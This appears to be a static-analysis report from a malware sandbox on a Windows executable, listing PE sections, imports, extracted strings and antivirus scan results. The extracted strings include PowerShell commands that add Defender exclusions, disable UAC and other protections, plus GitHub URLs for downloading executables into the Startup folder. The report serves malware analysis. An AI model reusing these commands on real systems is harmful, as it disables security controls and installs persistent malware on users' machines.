Static | ZeroBOX

PE Compile Time

2023-04-29 05:11:57

PE Imphash

d368098002d24bb51fe91ae21666133a

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00003b70 0x00003c00 6.14413155692
.rdata 0x00005000 0x0000343e 0x00003600 4.68258318737
.data 0x00009000 0x00000710 0x00000200 2.23500358545
.pdata 0x0000a000 0x00000450 0x00000600 3.25162039186
.rsrc 0x0000b000 0x0001d7e8 0x0001d800 7.78043471345
.reloc 0x00029000 0x00000058 0x00000200 1.08089990153

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0000ed84 0x000198c6 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x0000ed84 0x000198c6 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x0000ed84 0x000198c6 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x0000ed84 0x000198c6 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON 0x0002864c 0x0000003e LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x0002868c 0x0000015a LANG_ENGLISH SUBLANG_ENGLISH_US ASCII text, with CRLF line terminators

Imports

Library KERNEL32.dll:
0x140005018 WriteFile
0x140005020 CloseHandle
0x140005028 GetLastError
0x140005030 Sleep
0x140005038 GetCurrentProcess
0x140005040 CreateProcessW
0x140005048 GetModuleFileNameW
0x140005050 CreateFileA
0x140005058 AllocConsole
0x140005060 IsDebuggerPresent
0x140005068 InitializeSListHead
0x140005070 GetSystemTimeAsFileTime
0x140005078 GetCurrentThreadId
0x140005080 GetCurrentProcessId
0x140005088 QueryPerformanceCounter
0x140005098 CopyFileA
0x1400050b0 TerminateProcess
0x1400050c0 UnhandledExceptionFilter
0x1400050c8 RtlVirtualUnwind
0x1400050d0 RtlLookupFunctionEntry
0x1400050d8 RtlCaptureContext
0x1400050e0 GetModuleHandleW
Library USER32.dll:
0x140005200 FindWindowA
0x140005208 MessageBoxA
0x140005210 ShowWindow
Library SHELL32.dll:
0x1400051f0 ShellExecuteExA
Library ADVAPI32.dll:
0x140005000 OpenProcessToken
0x140005008 GetTokenInformation
Library MSVCP140.dll:
0x1400051d0 ??1_Lockit@std@@QEAA@XZ
0x1400051d8 ??0_Lockit@std@@QEAA@H@Z
Library WININET.dll:
0x140005280 InternetCloseHandle
0x140005288 InternetOpenUrlA
0x140005290 InternetReadFile
0x140005298 InternetOpenA
Library VCRUNTIME140.dll:
0x140005220 memmove
0x140005228 memcpy
0x140005230 __std_exception_copy
0x140005238 __std_terminate
0x140005240 __C_specific_handler
0x140005248 memset
0x140005250 memcmp
0x140005258 __std_exception_destroy
0x140005260 __CxxFrameHandler3
0x140005268 memchr
0x140005270 _CxxThrowException
Library api-ms-win-crt-runtime-l1-1-0.dll:
0x140005300 __p___argv
0x140005308 _initialize_onexit_table
0x140005318 _c_exit
0x140005320 __p___argc
0x140005328 terminate
0x140005330 _configure_narrow_argv
0x140005348 _initterm
0x140005350 _cexit
0x140005360 _crt_atexit
0x140005368 _seh_filter_exe
0x140005370 _exit
0x140005378 _initterm_e
0x140005380 system
0x140005388 exit
0x140005398 _set_app_type
Library api-ms-win-crt-stdio-l1-1-0.dll:
0x1400053a8 __p__commode
0x1400053b0 __stdio_common_vfprintf
0x1400053b8 _set_fmode
0x1400053c0 __acrt_iob_func
Library api-ms-win-crt-convert-l1-1-0.dll:
0x1400052a8 wcstombs
Library api-ms-win-crt-string-l1-1-0.dll:
0x1400053d0 strcpy_s
Library api-ms-win-crt-heap-l1-1-0.dll:
0x1400052b8 free
0x1400052c0 _callnewh
0x1400052c8 malloc
0x1400052d0 _set_new_mode
Library api-ms-win-crt-math-l1-1-0.dll:
0x1400052f0 __setusermatherr
Library api-ms-win-crt-locale-l1-1-0.dll:
0x1400052e0 _configthreadlocale

!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
VWATAVAWH
@A_A^A\_^
SVWATAUAVAWH
PA_A^A]A\_^[
WATAUAVAWH
@A_A^A]A\_
@SWATAVH
(A^A\_[
@SVAVAWH
(A_A^^[
WAVAWH
A_A^_
WAVAWH
A_A^_
\$ UVAVH
t&D9t$@w
UATAUH
fF9,Gu
@UWAVH
@UVAWH
UWATAVAWH
fF9$@u
A_A^A\_]
UWATAVAWH
A_A^A\_]
L$ SVWH
H3E H3E
u0HcH<H
Unknown exception
bad cast
%USERPROFILE%
Erreur lors de la copie du fichier : %d
Fichier copi
avec succ
Dir :
InternetOpenA failed with error code:
InternetOpenUrlA failed with error code:
CreateFileA failed with error code:
InternetReadFile failed with error code:
WriteFile failed with error code:
ConsoleWindowClass
Permission required
You need to run as administrator to install this tool.
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"%USERPROFILE%\AppData\Roaming\Microsoft\Windows'"
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Program Files\Windows NT\Accessories\fr-FR'"
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
powershell.exe -command "Set-MpPreference -PUAProtection disable"
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deluge.exe
https://github.com/sahdow3256/CNI/raw/main/Logiciel%20Scan%20CNI%20HNDK/Build_Test2.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Korsakoff.exe
https://github.com/sahdow3256/CNI/raw/main/Korsakoff.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Default.ttf
https://github.com/sahdow3256/CNI/raw/main/Default.ttf
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Keycheck.ttf
https://github.com/sahdow3256/CNI/raw/main/Keycheck.ttf
C:\Program Files\Windows NT\Accessories\fr-FR\deluge.exe
invalid string position
string too long
bad allocation
bad array new length
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.pdata
.rsrc$01
.rsrc$02
ExpandEnvironmentStringsA
ExpandEnvironmentStringsW
CreateFileA
WriteFile
CloseHandle
GetLastError
GetCurrentProcess
CreateProcessW
GetModuleFileNameW
CopyFileA
AllocConsole
KERNEL32.dll
ShowWindow
MessageBoxA
FindWindowA
USER32.dll
ShellExecuteExA
SHELL32.dll
OpenProcessToken
GetTokenInformation
ADVAPI32.dll
??0_Lockit@std@@QEAA@H@Z
??1_Lockit@std@@QEAA@XZ
?uncaught_exception@std@@YA_NXZ
?_Xlength_error@std@@YAXPEBD@Z
?_Xout_of_range@std@@YAXPEBD@Z
??Bid@locale@std@@QEAA_KXZ
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ
?widen@?$ctype@_W@std@@QEBA_WD@Z
?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z
?getloc@ios_base@std@@QEBA?AVlocale@2@XZ
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z
?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAA_JPEB_W_J@Z
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z
?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z
?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z
?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z
?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ
?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z
?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z
?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ
?id@?$ctype@_W@std@@2V0locale@2@A
?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A
MSVCP140.dll
InternetOpenA
InternetCloseHandle
InternetOpenUrlA
InternetReadFile
WININET.dll
__std_terminate
__std_exception_copy
__std_exception_destroy
_CxxThrowException
__CxxFrameHandler3
memchr
memcmp
memcpy
memmove
memset
__C_specific_handler
VCRUNTIME140.dll
_invalid_parameter_noinfo_noreturn
__acrt_iob_func
__stdio_common_vfprintf
wcstombs
system
strcpy_s
_callnewh
malloc
_seh_filter_exe
_set_app_type
__setusermatherr
_configure_narrow_argv
_initialize_narrow_environment
_get_initial_narrow_environment
_initterm
_initterm_e
_set_fmode
__p___argc
__p___argv
_cexit
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
_initialize_onexit_table
_register_onexit_function
_crt_atexit
terminate
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-convert-l1-1-0.dll
api-ms-win-crt-string-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetModuleHandleW
.?AVexception@std@@
.?AVbad_cast@std@@
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVbad_array_new_length@std@@
$"}L=.
&$!o[M>
&$!tZL=
IDATx^
pypwww
e'd+Qn|
2BKVCh
%X/AR)W
DCr)Ib)Z
YJWAVZv*
VmJbiI
'Pd_8B6
Ip%+T7e&R
/QPF"(t
y]s9bX
&r Id#
)+sl<E;i
BglB^Z
iGy~/B&m
>E "p$
y--'=~N
f&A<c%
w`6/MP
R T-T!7x
h1w=jO^
m>AJZ*z
y0Rw#A
@L@JAy
f=m!P5
nC|9p(&O
"K`(j7
-T8/u@
(4E ;u:
*@j \#
uZu3`{Y~
-RzH5C
sQnt@J
6C%{3P?
e&o@.z~
al_\I@o2
a'cx\[v
-!VrP;
Z]m:'p
pRmPU
0b)7/"
)]/i;+
Q>@e4t
$KP>0%
n7!7[P
Kj}@O*
5n=|n#
O*@$0i
s}l:p%*
"pS}_
}/ Q]o
#.\72pk
V*1H"PH
GI?I~y}
[zQ)U@
HEPOGs
=pRNA:
(TtO^x
?#b+JB
txIBZv
^>3K'>-F
E80]6nY'
_|)c'L
]Y"[?#
t:pbrk]
xI)U6@
<Q<DK}
HLRUm#~
Vl.E}#
$tU x|V
j<WBqW
s@z~*
*ow ]
j)R6<V
%5-S&L
%@B8E2
(1*H]`&
s;tU!.
E@2PE@
h(@`y@
0'=KAO
[O:ul#
GN"")pk
S-u&Z@d
K2uJ0U
|,CFMR
?c~z}N
;=*`)@
S|1rM@
4@@A!
[.QVd.
}!Wo~!
*H 42F
C'/BBg
R&$N|B
_/Q6D7
D$JtRu
)WY|cjK
-(Sf,`
KT-fuc]
wJ wH@
&]/ s}6d
okcNt|
-L_)K8U
.|4\c
UIj6~I
r<cF{n@m
T&!8Fe
;P@ .`
Hh|lx|
"A44#L
F%D:dY
~<,X8|
^qT8T\
jOvTjO
rP0 x(
R0x x(
K(F lhr
::o)Wk
rP0=W8
9+wBZ)w
B+0x8x@
W+8xy(
PA<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGX
%USERPROFILE%
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Korsakoff.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deluge.exe
IDI_ICON1(
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic Clean
DrWeb Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
Cybereason Clean
Arcabit Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Clean
tehtris Clean
ESET-NOD32 Clean
APEX Clean
Paloalto generic.ml
ClamAV Clean
Kaspersky UDS:Trojan-Spy.MSIL.Generic
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
Trapmine Clean
CMC Clean
Emsisoft Clean
Ikarus Clean
Jiangmin Clean
Webroot Clean
Google Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Trojan.Win64.Gen.bot
Xcitium Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm UDS:Trojan-Spy.MSIL.Generic
GData Clean
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
DeepInstinct Clean
VBA32 Clean
Cylance Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet Clean
AVG Clean
Avast Clean
CrowdStrike Clean
No IRMA results available.